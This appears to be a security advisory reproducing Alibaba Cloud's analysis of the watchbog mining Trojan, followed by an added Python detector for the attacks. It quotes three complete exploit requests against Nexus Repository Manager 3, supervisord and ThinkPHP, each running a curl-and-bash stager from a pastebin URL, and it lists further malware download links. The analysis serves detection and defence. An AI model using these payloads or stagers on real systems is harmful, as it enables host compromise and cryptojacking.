CVSS3: 8.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS2: 9 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: SINGLE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C

EPSS: 0.974 High
Percentile: 99.9%
Recently, Alibaba Cloud Security monitoring observed the watchbog mining Trojan exploiting the newly disclosed Nexus Repository Manager 3 remote code execution vulnerability (CVE-2019-7238) to compromise hosts and mine cryptocurrency.
Notably, this attack started on February 24, only a little over half a month after the product's parent company published its vulnerability advisory on February 5, which once again confirms that the time from a vulnerability's disclosure to its use by black-market actors for mining keeps getting shorter. In addition, the attacker also exploits vulnerabilities in products such as supervisord and ThinkPHP.
This article analyzes the Trojan's internal structure and mode of propagation, and gives security recommendations on how to clean it up and how to prevent similar mining Trojans.
Mining Trojan spread analysis
The attacker spreads the Trojan mainly by directly attacking vulnerabilities in host services, which means it currently has no worm-like self-propagation; in this respect it resembles the 8220 gang. Even so, the attacker still controls a large number of compromised hosts ("broiler chickens", i.e. zombie machines).
In particular, on February 24 the attack expanded from targeting only ThinkPHP and supervisord to include attack code for Nexus Repository Manager 3. The mining pool's hash rate surged about 3-fold that day, reaching around 210 KH/s, with earnings of about $25/day, meaning that at its peak as many as 1 to 2 million hosts may have been controlled for mining.
The following are the three types of attack payload captured by Alibaba Cloud Security.
(1) Exploitation of the Nexus Repository Manager 3 remote code execution vulnerability (CVE-2019-7238)
POST /service/extdirect HTTP/1.1
Host: 【victim_ip】:8081
X-Requested-With: XMLHttpRequest
Content-Type: application/json

{"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "233.class.forName('java.lang.Runtime').getRuntime().exec('curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby')"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}
(2) Exploitation of the supervisord remote command execution vulnerability (CVE-2017-11610)
POST /RPC2 HTTP/1.1
Host: 【victim_ip】:9001
Content-Type: application/x-www-form-urlencoded

u0002u0002supervisor.supervisord.options.warnings.linecache.os.systemu0002
u0002
u0002curl https://pastebin.com/raw/zXcDajSs -o /tmp/babyu0002u0002u0002
(3) Exploitation of the ThinkPHP remote command execution vulnerability
POST /index.php?s=captcha HTTP/1.1
Host: 【victim_host】
Content-Type: application/x-www-form-urlencoded

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby
All three payloads serve the same purpose: taking control of the host by executing the following command.
curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby
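As an added detection example (not part of the original article and not Alibaba Cloud's own tooling), the following Python scans HTTP request records for the three exploitation patterns shown above and for the download-and-run stager they share. The request records are constructed here from the payloads above (with the supervisord body reduced to its method name and command), the rule names are labels chosen for this example, and a real deployment would feed it parsed web-server or proxy logs instead.

```python
"""Flag watchbog-style exploitation attempts in HTTP request records.

Added example: the rules key on the exploitation primitive in each payload
(JEXL expression, supervisord XML-RPC method path, ThinkPHP _method trick)
rather than on the attacker's download host, so a changed paste URL still
matches. The shared stager is reported separately with the dropped path.
"""
import re
from urllib.parse import unquote_plus

# (rule name, path pattern, body pattern); names are this example's own labels.
RULES = [
    (
        "nexus3-extdirect-jexl (CVE-2019-7238)",
        re.compile(r"^/service/extdirect"),
        re.compile(r"class\s*\.\s*forName|getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(", re.I),
    ),
    (
        "supervisord-xmlrpc-os.system (CVE-2017-11610)",
        re.compile(r"^/RPC2"),
        re.compile(r"supervisor\.supervisord\.options\.\S*os\.system", re.I),
    ),
    (
        "thinkphp-captcha-__construct",
        re.compile(r"^/index\.php\?s=captcha"),
        re.compile(r"_method=__construct.*filter\[\]=system", re.I | re.S),
    ),
]

# The stager all three payloads run: curl a paste-site script into /tmp,
# optionally followed by "; bash <same file>". Tolerates "curl-fsSL" spacing.
STAGER = re.compile(
    r"curl\s*(?:-\S+\s+)*https?://pastebin\.com/raw/\S+\s+-o\s+(/tmp/[\w./-]+)",
    re.I,
)


def classify_request(method, path, body):
    """Return matching rule names, plus 'stager:<path>' when the shared
    download-and-run command appears anywhere in the (URL-decoded) body."""
    decoded = unquote_plus(body)
    hits = []
    if method.upper() == "POST":
        for name, path_re, body_re in RULES:
            if path_re.search(path) and body_re.search(decoded):
                hits.append(name)
    m = STAGER.search(decoded)
    if m:
        hits.append("stager:" + m.group(1))
    return hits


def scan(records):
    """Map record index -> hits for every record that triggered something."""
    findings = {}
    for i, r in enumerate(records):
        hits = classify_request(r["method"], r["path"], r["body"])
        if hits:
            findings[i] = hits
    return findings


# Constructed sample traffic: one record per payload family, then benign calls.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/service/extdirect",
     "body": ('{"action":"coreui_Component","type":"rpc","tid":8,"data":[{"filter":['
              '{"property":"repositoryName","value":"*"},'
              '{"property":"expression","value":"233.class.forName(\'java.lang.Runtime\')'
              '.getRuntime().exec(\'curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby\')"},'
              '{"property":"type","value":"jexl"}]}],"method":"previewAssets"}')},
    {"method": "POST", "path": "/RPC2",
     "body": "supervisor.supervisord.options.warnings.linecache.os.system "
             "curl https://pastebin.com/raw/zXcDajSs -o /tmp/baby"},
    {"method": "POST", "path": "/index.php?s=captcha",
     "body": "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]="
             "curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby"},
    # Benign traffic for contrast: an ordinary Nexus UI call and a status probe.
    {"method": "POST", "path": "/service/extdirect",
     "body": '{"action":"coreui_Component","method":"readState","type":"rpc","tid":1}'},
    {"method": "GET", "path": "/service/rest/v1/status", "body": ""},
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_REQUESTS).items():
        print(f"record {idx}: {', '.join(hits)}")
```

Records 0 to 2 each produce one rule hit plus `stager:/tmp/baby`; the two benign records produce nothing. Because the body is URL-decoded before matching, the ThinkPHP rule also catches clients that percent-encode the brackets.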
Trojan functional structure analysis
Once compromised, the host fetches https://pastebin.com/raw/zXcDajSs which, after several redirects, yields the shell script shown in the figure below; it contains functions such as cronlow(), cronhigh() and flyaway().
[Figure: the downloaded shell script, showing the cronlow(), cronhigh() and flyaway() functions]
According to the analysis, the script mainly consists of the following modules:
It then requests several addresses such as https://pastebin.com/raw/05p0fTYd and executes whatever commands it receives. Interestingly, these addresses currently hold only some ordinary words, possibly reserved by the Trojan author for future use.
The flyaway() function differs slightly from dragon(): it first downloads https://pixeldra.in/api/download/8iFEEg to /tmp/elavate and runs it.